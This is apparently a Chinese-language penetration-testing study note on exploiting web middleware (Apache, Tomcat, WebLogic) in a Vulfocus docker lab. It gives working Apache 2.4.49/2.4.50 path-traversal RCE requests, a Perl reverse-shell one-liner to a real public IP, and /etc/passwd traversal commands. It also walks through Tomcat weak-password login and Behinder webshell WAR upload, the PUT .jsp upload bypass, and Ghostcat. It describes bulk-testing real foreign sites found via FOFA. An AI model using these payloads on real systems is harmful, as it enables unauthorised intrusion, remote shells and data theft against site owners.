目录

中间件的安全问题

中间件的安全问题

前言

了解常见的中间件 : IIS 、 apache、nignx、tomcat

环境搭建中间件的安全问题主要就是实战以前发现的CVE漏洞

环境搭建 上个笔记有如何在kali进行搭建docker

准备kali   已经搭建了docker

sudo docker pull vulfocus/vulfocus:latest 
拉取镜像
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=xxxx vulfocus/vulfocus
启动镜像    run是运行   -d 在后台   -p 端口   -v是进行挂载  : 后边是容器的路径   意思就是把容器的内容映射到本地机目录上    而  -e是设置容器的环境变量

注意这个 ip 0000 是你本机的ip

https://i-blog.csdnimg.cn/direct/0912d1b6f2f348899afbca7facc2d7a3.png

里面有个log

apache框架下有利于价值的CVE

1、RCE命令执行

应用于apache  2.4.49-2.4.50

我们利用漏洞之前先找到这个漏洞的中间件的版本 https://i-blog.csdnimg.cn/direct/543a9ec3023541889ac770adf711cfa6.png

正好是在这个版本的 https://i-blog.csdnimg.cn/direct/d380d36c7521458e87c3c7de67b80944.png

利用exp进行操作

使用服务器进行curl请求
curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'


抓包改包修改
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 
echo;perl -e 'use Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

利用exp进行操作 https://i-blog.csdnimg.cn/direct/85a2364a883945cb94483d10a06c25a6.png

这个rce框架漏洞我们可以进行全网搜   先使用 fafoviewer生成使用fafo搜索的信息可以去批量的测试(这里测试的都是外国网站)

fofa语法: https://i-blog.csdnimg.cn/direct/886a34c9d9a54b24b2ff78060f639b85.png

这边只导出10个是因为我设置的最大导出 https://i-blog.csdnimg.cn/direct/68f776cd6a5140cda318a6a68f051852.png

2、目录穿越漏洞

https://i-blog.csdnimg.cn/direct/877f45568bea4ce08e21de79a4f5b10e.png

curl -v --path-as-is 'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

https://i-blog.csdnimg.cn/direct/a66d5f23db5545a68b568d260108ed68.png

可以直接访问

tomcat框架

1、弱口令爆破

这个就是利用tomcat登录弹窗的弱密码 https://i-blog.csdnimg.cn/direct/6b3e3d7bfc554c35bd3cfa6efe862b9c.png

之后需要getshell

骚操作: 冰蝎生成一个jar木马

https://i-blog.csdnimg.cn/direct/b73d6e988a284733983bdf076b5b12d9.png

https://i-blog.csdnimg.cn/direct/8d5e7cad1c21401286a6c989701f0601.png

和gzl有很明显的差别就是开头没有system

https://i-blog.csdnimg.cn/direct/cd33f22fdba54ce9bc3fb20089b2fb30.png

这里让我们上传的是  war文件

https://i-blog.csdnimg.cn/direct/5822e407935c45dea2e8def6d7d8ca7c.png

https://i-blog.csdnimg.cn/direct/038d3df137744e23a22067c16c91a163.png

压缩一下改名为 war https://i-blog.csdnimg.cn/direct/000d5795d6b44108b89d295743d8da8e.png

https://i-blog.csdnimg.cn/direct/7845ffdffd3b4878b3e1a64b54d271f9.png

http://192.168.248.132:11374/shell/shell.jsp

连接上就行

2、文件上传漏洞

Apache Tomcat 7.0.0 - 7.0.79

https://i-blog.csdnimg.cn/direct/33d869d0ce054f6680ba694ec70e63d9.png

https://i-blog.csdnimg.cn/direct/02a831d022c84bd18006fa0bf8f3ac87.png

https://i-blog.csdnimg.cn/direct/267b8ef60a534096bdb9f5b6d776c479.png

然后复制木马的内容到这个请求数据包的下面 https://i-blog.csdnimg.cn/direct/4e8be0e0e36b4b05bae006991ba9ec55.png

发现报错404??????什么情况   是因为我们后边的http把这个1.jsp当路径处理了但是这个网站内部是没有这个的所以报错了

绕过方式 :   /xx.jsp/          //进行包裹

https://i-blog.csdnimg.cn/direct/a60e6aac8b3146feadcaf36477d8b0bb.png

就可以进行连接了

3、文件包含漏洞

Tomcat 6.*

Tomcat 7.* < 7.0.100

Tomcat 8.* < 8.5.51

Tomcat 9.* < 9.0.31

使用 https://i-blog.csdnimg.cn/direct/17f1d818db0843acb7092d939ebfbcc7.png

这个工具是py2开发的

weblogic

没什么好说的就是工具梭哈

https://i-blog.csdnimg.cn/direct/b3690f4303d54280904dfaa0bca20cc3.png

天狐工具包wx搜 狐狸即可下载

https://i-blog.csdnimg.cn/direct/3e8d7cc6ac53495a8f5d46872f9298d7.png

点击检查  如果不知道是哪个CVE就一把梭   知道会快很多